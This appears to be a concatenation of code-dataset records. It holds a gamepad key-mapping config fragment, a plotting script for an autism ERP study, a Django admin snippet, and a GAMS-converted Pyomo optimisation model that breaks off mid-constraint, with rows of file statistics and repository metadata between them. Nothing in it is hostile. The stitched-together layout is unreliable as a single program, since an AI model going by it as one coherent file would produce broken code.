ABS_Y: {
'type' : (0, EV_KEY),
'code' : 108,
'value' : digitizeDown2
},
ABS_Z: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : hat0Pos
},
ABS_RZ: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : hat0Pos
},
ABS_HAT0X: {
'type' : (0, EV_KEY),
'code' : 105,
'value' : hat0Neg
},
ABS_HAT0Y: {
'type' : (0, EV_KEY),
'code' : 103,
'value' : hat0Neg
}
}
}
names = {
0 : 'MakeCode_Arcade'
}
def config_merge(c, n):
c.clear()
c.update(config)
n.update(names)
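# uinput-mapper presumably imports this module and passes its own dicts to
# config_merge; a standalone sanity check (assumption: the file is run
# directly, outside uinput-mapper) could look like:
if __name__ == '__main__':
    c, n = {}, {}
    config_merge(c, n)
    assert n[0] == 'MakeCode_Arcade'
    print('%d (device, event-type) groups mapped' % len(c))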
| 17.298755 | 118 | 0.506117 | 1,153 | 8,338 | 3.551605 | 0.124892 | 0.065934 | 0.071795 | 0.117216 | 0.809768 | 0.796093 | 0.774359 | 0.706471 | 0.706471 | 0.588523 | 0 | 0.060417 | 0.327057 | 8,338 | 481 | 119 | 17.334719 | 0.669399 | 0.114056 | 0 | 0.744681 | 0 | 0 | 0.088443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.002364 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aa47ef77f2f06b39a0e162e7ce1ed73ca555888c | 3,443 | py | Python | generate_SuppFigSI2.py | haribharadwaj/PLOSBiol_ASD_ObjectFormation | 5ea164876b00b3d11965e7f4a443abbfcfa7b252 | [
"BSD-3-Clause"
] | null | null | null | generate_SuppFigSI2.py | haribharadwaj/PLOSBiol_ASD_ObjectFormation | 5ea164876b00b3d11965e7f4a443abbfcfa7b252 | [
"BSD-3-Clause"
] | null | null | null | generate_SuppFigSI2.py | haribharadwaj/PLOSBiol_ASD_ObjectFormation | 5ea164876b00b3d11965e7f4a443abbfcfa7b252 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Generate Supplementary Figure SI2: normalized evoked responses versus the
number of coherent tones, plotted for the left and right hemispheres in the
TD (n=26) and ASD (n=21) groups.
"""
from scipy import io
import numpy as np
import pylab as pl
fname = 'ERPsummary_zscore_left.mat'
dat = io.loadmat(fname)
t = dat['t'].flatten()
c6 = dat['c6']
c12 = dat['c12']
c18 = dat['c18']
peak = 'combined'
start, stop = (0.05, 0.44)
pl.subplot(1, 2, 1)
s6 = c6[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s12 = c12[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s18 = c18[:, np.logical_and(t > start, t < stop)].mean(axis=1)
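# s6/s12/s18: each subject's mean z-scored response over the 0.05-0.44 s
# analysis window, giving one value per subject and coherence condition.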
# TD group, left hemisphere: rows :26 are the TD subjects (SEM over n=26)
x = np.asarray([5.75, 11.75, 17.75])
y = np.asarray([s6[:26].mean(), s12[:26].mean(), s18[:26].mean()])
yerr = np.asarray([s6[:26].std() / (26 ** 0.5), s12[:26].std() / (26 ** 0.5),
s18[:26].std() / (26 ** 0.5)])
pl.errorbar(x, y, yerr,
fmt='ob-', elinewidth=2)
fname = 'ERPsummary_zscore_right.mat'
dat = io.loadmat(fname)
t = dat['t'].flatten()
c6 = dat['c6']
c12 = dat['c12']
c18 = dat['c18']
peak = 'combined'
start, stop = (0.05, 0.44)
# TD group, right hemisphere (same 26 subjects)
s6 = c6[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s12 = c12[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s18 = c18[:, np.logical_and(t > start, t < stop)].mean(axis=1)
x = np.asarray([5.75, 11.75, 17.75])
x = x + 0.5
y = np.asarray([s6[:26].mean(), s12[:26].mean(), s18[:26].mean()])
yerr = np.asarray([s6[:26].std() / (26 ** 0.5), s12[:26].std() / (26 ** 0.5),
s18[:26].std() / (26 ** 0.5)])
pl.errorbar(x, y, yerr,
fmt='ob--', elinewidth=2)
pl.xlabel('Number of Coherent Tones', fontsize=16)
pl.ylabel('Evoked Response (normalized)', fontsize=16)
pl.xticks((6, 12, 18))
pl.ylim((1.0, 4.25))
ax = pl.gca()
ax.tick_params(labelsize=14)
pl.legend(('Left', 'Right'), loc='upper left')
## LOAD DATA AGAIN FOR ASD
fname = 'ERPsummary_zscore_left.mat'
dat = io.loadmat(fname)
t = dat['t'].flatten()
c6 = dat['c6']
c12 = dat['c12']
c18 = dat['c18']
peak = 'combined'
start, stop = (0.05, 0.44)
pl.subplot(1, 2, 2)
s6 = c6[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s12 = c12[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s18 = c18[:, np.logical_and(t > start, t < stop)].mean(axis=1)
# ASD group, left hemisphere: rows 26: are the ASD subjects (SEM over n=21)
y = np.asarray([s6[26:].mean(), s12[26:].mean(), s18[26:].mean()])
yerr = np.asarray([s6[26:].std() / (21 ** 0.5), s12[26:].std() / (21 ** 0.5),
s18[26:].std() / (21 ** 0.5)])
pl.errorbar(x, y, yerr,
fmt='sr-', elinewidth=2)
pl.xlabel('Number of Coherent Tones', fontsize=16)
pl.xticks((6, 12, 18))
ax = pl.gca()
ax.tick_params(labelsize=14)
pl.legend(('Left', 'Right'), loc='upper left')
# ASD group, right hemisphere (same 21 subjects)
fname = 'ERPsummary_zscore_right.mat'
dat = io.loadmat(fname)
t = dat['t'].flatten()
c6 = dat['c6']
c12 = dat['c12']
c18 = dat['c18']
peak = 'combined'
start, stop = (0.05, 0.44)
s6 = c6[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s12 = c12[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s18 = c18[:, np.logical_and(t > start, t < stop)].mean(axis=1)
x = x + 0.5
y = np.asarray([s6[26:].mean(), s12[26:].mean(), s18[26:].mean()])
yerr = np.asarray([s6[26:].std() / (21 ** 0.5), s12[26:].std() / (21 ** 0.5),
s18[26:].std() / (21 ** 0.5)])
pl.errorbar(x, y, yerr,
fmt='sr--', elinewidth=2)
pl.xlabel('Number of Coherent Tones', fontsize=16)
pl.xticks((6, 12, 18))
pl.ylim((1.0, 4.25))
ax = pl.gca()
ax.tick_params(labelsize=14)
pl.legend(('Left', 'Right'), loc='upper left') | 28.454545 | 77 | 0.576823 | 607 | 3,443 | 3.233937 | 0.163097 | 0.014264 | 0.073357 | 0.07947 | 0.91136 | 0.91136 | 0.91136 | 0.91136 | 0.91136 | 0.890474 | 0 | 0.114806 | 0.1702 | 3,443 | 121 | 78 | 28.454545 | 0.572279 | 0.037758 | 0 | 0.89011 | 0 | 0 | 0.104545 | 0.032121 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.032967 | 0 | 0.032967 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
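# The four load/plot blocks above repeat the same load-window-average
# pattern; a compact helper (hypothetical, assuming the same .mat layout)
# returning per-condition group means and SEMs could be:
def _windowed_means(fname, rows, start=0.05, stop=0.44):
    from scipy import io
    import numpy as np
    dat = io.loadmat(fname)
    t = dat['t'].flatten()
    win = np.logical_and(t > start, t < stop)
    out = []
    for key in ('c6', 'c12', 'c18'):
        s = dat[key][:, win].mean(axis=1)[rows]
        out.append((s.mean(), s.std() / len(s) ** 0.5))
    return out
# e.g. _windowed_means('ERPsummary_zscore_left.mat', slice(0, 26)) for TD-left.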
a4aec5dd684dda9a572d81d962dc90ee8ac6f044 | 102 | py | Python | platform/core/polyaxon/administration/register/bookmarks.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | platform/core/polyaxon/administration/register/bookmarks.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | platform/core/polyaxon/administration/register/bookmarks.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | from db.models.bookmarks import Bookmark
def register(admin_register):
admin_register(Bookmark)
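# Presumably invoked by polyaxon's admin registration machinery, along the
# lines of:
#   from django.contrib import admin
#   register(admin.site.register)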
| 17 | 40 | 0.803922 | 13 | 102 | 6.153846 | 0.692308 | 0.325 | 0.525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127451 | 102 | 5 | 41 | 20.4 | 0.898876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
351f066654a5643bb7ab624ad7f0f5022e4f331f | 36,074 | py | Python | models_nonconvex_simple2/feedtray2.py | grossmann-group/pyomo-MINLP-benchmarking | 714f0a0dffd61675649a805683c0627af6b4929e | [
"MIT"
] | null | null | null | models_nonconvex_simple2/feedtray2.py | grossmann-group/pyomo-MINLP-benchmarking | 714f0a0dffd61675649a805683c0627af6b4929e | [
"MIT"
] | null | null | null | models_nonconvex_simple2/feedtray2.py | grossmann-group/pyomo-MINLP-benchmarking | 714f0a0dffd61675649a805683c0627af6b4929e | [
"MIT"
] | null | null | null | # MINLP written by GAMS Convert at 08/20/20 01:30:43
#
# Equation counts
# Total E G L N X C B
# 284 7 114 163 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 88 52 36 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 1627 685 942 0
from pyomo.environ import *
model = m = ConcreteModel()
m.b1 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b3 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b4 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b5 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b6 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b7 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b8 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b9 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b10 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b11 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b12 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b13 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b14 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b15 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b16 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b17 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b18 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b19 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b20 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b21 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b22 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b23 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b24 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b25 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b26 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b27 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b28 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b29 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b30 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b31 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b32 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b33 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b34 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b35 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b36 = Var(within=Binary,bounds=(0,1),initialize=0)
m.x37 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x38 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x39 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x40 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x41 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x42 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x43 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x44 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x45 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x46 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x47 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x48 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x49 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x50 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x51 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x52 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x53 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x54 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x55 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x56 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x57 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x58 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x59 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x60 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x61 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x62 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x63 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x64 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x65 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x66 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x67 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x68 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x69 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x70 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x71 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x72 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x73 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x74 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x75 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x76 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x77 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x78 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x79 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x80 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x81 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x84 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x85 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x86 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x87 = Var(within=Reals,bounds=(0,100),initialize=0)
m.x88 = Var(within=Reals,bounds=(0,5),initialize=0)
m.obj = Objective(expr=m.x88, sense=minimize)
m.c1 = Constraint(expr=m.x87*m.x61 + 1000*m.b1 <= 1000.024)
m.c2 = Constraint(expr=m.x87*m.x63 + 1000*m.b2 <= 1000.024)
m.c3 = Constraint(expr=m.x87*m.x65 + 1000*m.b3 <= 1000.024)
m.c4 = Constraint(expr=m.x87*m.x67 + 1000*m.b4 <= 1000.024)
m.c5 = Constraint(expr=m.x87*m.x69 + 1000*m.b5 <= 1000.024)
m.c6 = Constraint(expr=m.x87*m.x71 + 1000*m.b6 <= 1000.024)
m.c7 = Constraint(expr=m.x87*m.x73 + 1000*m.b7 <= 1000.024)
m.c8 = Constraint(expr=m.x87*m.x75 + 1000*m.b8 <= 1000.024)
m.c9 = Constraint(expr=m.x87*m.x77 + 1000*m.b9 <= 1000.024)
m.c10 = Constraint(expr=m.x87*m.x79 + 1000*m.b10 <= 1000.024)
m.c11 = Constraint(expr=m.x87*m.x81 + 1000*m.b11 <= 1000.024)
m.c12 = Constraint(expr=m.x87*m.x83 + 1000*m.b12 <= 1000.024)
m.c13 = Constraint(expr=(100*m.b14 + 100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21
+ 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x39 + m.x86*m.x63 - (100*m.b15 + 100*m.b16 + 100
*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x41 - m.x86*m.x61 - 80*m.b14 - 1000*m.b2 + 1000*m.b26 <= 1000)
m.c14 = Constraint(expr=(100*m.b14 + 100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21
+ 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x40 + m.x86*m.x64 - (100*m.b15 + 100*m.b16 + 100
*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x42 - m.x86*m.x62 - 20*m.b14 - 1000*m.b2 + 1000*m.b26 <= 1000)
m.c15 = Constraint(expr=(100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22
+ 100*m.b23 + 100*m.b24 + m.x85)*m.x41 + m.x86*m.x65 - (100*m.b16 + 100*m.b17 + 100*m.b18 + 100
*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x43 - m.x86*m.x63
- 80*m.b15 - 1000*m.b3 + 1000*m.b27 <= 1000)
m.c16 = Constraint(expr=(100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22
+ 100*m.b23 + 100*m.b24 + m.x85)*m.x42 + m.x86*m.x66 - (100*m.b16 + 100*m.b17 + 100*m.b18 + 100
*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x44 - m.x86*m.x64
- 20*m.b15 - 1000*m.b3 + 1000*m.b27 <= 1000)
m.c17 = Constraint(expr=(100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23
+ 100*m.b24 + m.x85)*m.x43 + m.x86*m.x67 - (100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100
*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x45 - m.x86*m.x65 - 80*m.b16 - 1000*m.b4
+ 1000*m.b28 <= 1000)
m.c18 = Constraint(expr=(100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23
+ 100*m.b24 + m.x85)*m.x44 + m.x86*m.x68 - (100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100
*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x46 - m.x86*m.x66 - 20*m.b16 - 1000*m.b4
+ 1000*m.b28 <= 1000)
m.c19 = Constraint(expr=(100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24
+ m.x85)*m.x45 + m.x86*m.x69 - (100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100
*m.b23 + 100*m.b24 + m.x85)*m.x47 - m.x86*m.x67 - 80*m.b17 - 1000*m.b5 + 1000*m.b29 <= 1000)
m.c20 = Constraint(expr=(100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24
+ m.x85)*m.x46 + m.x86*m.x70 - (100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100
*m.b23 + 100*m.b24 + m.x85)*m.x48 - m.x86*m.x68 - 20*m.b17 - 1000*m.b5 + 1000*m.b29 <= 1000)
m.c21 = Constraint(expr=(100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*
m.x47 + m.x86*m.x71 - (100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x49 - m.x86*m.x69 - 80*m.b18 - 1000*m.b6 + 1000*m.b30 <= 1000)
m.c22 = Constraint(expr=(100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*
m.x48 + m.x86*m.x72 - (100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x50 - m.x86*m.x70 - 20*m.b18 - 1000*m.b6 + 1000*m.b30 <= 1000)
m.c23 = Constraint(expr=(100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x49 + m.x86*
m.x73 - (100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x51 - m.x86*m.x71
- 80*m.b19 - 1000*m.b7 + 1000*m.b31 <= 1000)
m.c24 = Constraint(expr=(100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x50 + m.x86*
m.x74 - (100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x52 - m.x86*m.x72
- 20*m.b19 - 1000*m.b7 + 1000*m.b31 <= 1000)
m.c25 = Constraint(expr=(100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x51 + m.x86*m.x75 - (100*
m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x53 - m.x86*m.x73 - 80*m.b20 - 1000*m.b8
+ 1000*m.b32 <= 1000)
m.c26 = Constraint(expr=(100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x52 + m.x86*m.x76 - (100*
m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x54 - m.x86*m.x74 - 20*m.b20 - 1000*m.b8
+ 1000*m.b32 <= 1000)
m.c27 = Constraint(expr=(100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x53 + m.x86*m.x77 - (100*m.b22 + 100*
m.b23 + 100*m.b24 + m.x85)*m.x55 - m.x86*m.x75 - 80*m.b21 - 1000*m.b9 + 1000*m.b33 <= 1000)
m.c28 = Constraint(expr=(100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x54 + m.x86*m.x78 - (100*m.b22 + 100*
m.b23 + 100*m.b24 + m.x85)*m.x56 - m.x86*m.x76 - 20*m.b21 - 1000*m.b9 + 1000*m.b33 <= 1000)
m.c29 = Constraint(expr=(100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x55 + m.x86*m.x79 - (100*m.b23 + 100*m.b24 + m.x85
)*m.x57 - m.x86*m.x77 - 80*m.b22 - 1000*m.b10 + 1000*m.b34 <= 1000)
m.c30 = Constraint(expr=(100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x56 + m.x86*m.x80 - (100*m.b23 + 100*m.b24 + m.x85
)*m.x58 - m.x86*m.x78 - 20*m.b22 - 1000*m.b10 + 1000*m.b34 <= 1000)
m.c31 = Constraint(expr=(100*m.b23 + 100*m.b24 + m.x85)*m.x57 + m.x86*m.x81 - (100*m.b24 + m.x85)*m.x59 - m.x86*m.x79 -
80*m.b23 - 1000*m.b11 + 1000*m.b35 <= 1000)
m.c32 = Constraint(expr=(100*m.b23 + 100*m.b24 + m.x85)*m.x58 + m.x86*m.x82 - (100*m.b24 + m.x85)*m.x60 - m.x86*m.x80 -
20*m.b23 - 1000*m.b11 + 1000*m.b35 <= 1000)
m.c33 = Constraint(expr=m.x86*m.x61 - (100 + m.x85)*m.x39 + 80*m.x37 == 0)
m.c34 = Constraint(expr=m.x86*m.x62 - (100 + m.x85)*m.x40 + 80*m.x38 == 0)
m.c35 = Constraint(expr=(100*m.b14 + 100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21
+ 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x39 + m.x86*m.x63 - (100*m.b15 + 100*m.b16 + 100
*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x41 - m.x86*m.x61 - 80*m.b14 - 1000*m.b2 + 1000*m.b26 >= 1000)
m.c36 = Constraint(expr=(100*m.b14 + 100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21
+ 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x40 + m.x86*m.x64 - (100*m.b15 + 100*m.b16 + 100
*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x42 - m.x86*m.x62 - 20*m.b14 - 1000*m.b2 + 1000*m.b26 >= 1000)
m.c37 = Constraint(expr=(100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22
+ 100*m.b23 + 100*m.b24 + m.x85)*m.x41 + m.x86*m.x65 - (100*m.b16 + 100*m.b17 + 100*m.b18 + 100
*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x43 - m.x86*m.x63
- 80*m.b15 - 1000*m.b3 + 1000*m.b27 >= 1000)
m.c38 = Constraint(expr=(100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22
+ 100*m.b23 + 100*m.b24 + m.x85)*m.x42 + m.x86*m.x66 - (100*m.b16 + 100*m.b17 + 100*m.b18 + 100
*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x44 - m.x86*m.x64
- 20*m.b15 - 1000*m.b3 + 1000*m.b27 >= 1000)
m.c39 = Constraint(expr=(100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23
+ 100*m.b24 + m.x85)*m.x43 + m.x86*m.x67 - (100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100
*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x45 - m.x86*m.x65 - 80*m.b16 - 1000*m.b4
+ 1000*m.b28 >= 1000)
m.c40 = Constraint(expr=(100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23
+ 100*m.b24 + m.x85)*m.x44 + m.x86*m.x68 - (100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100
*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x46 - m.x86*m.x66 - 20*m.b16 - 1000*m.b4
+ 1000*m.b28 >= 1000)
m.c41 = Constraint(expr=(100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24
+ m.x85)*m.x45 + m.x86*m.x69 - (100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100
*m.b23 + 100*m.b24 + m.x85)*m.x47 - m.x86*m.x67 - 80*m.b17 - 1000*m.b5 + 1000*m.b29 >= 1000)
m.c42 = Constraint(expr=(100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24
+ m.x85)*m.x46 + m.x86*m.x70 - (100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100
*m.b23 + 100*m.b24 + m.x85)*m.x48 - m.x86*m.x68 - 20*m.b17 - 1000*m.b5 + 1000*m.b29 >= 1000)
m.c43 = Constraint(expr=(100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*
m.x47 + m.x86*m.x71 - (100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
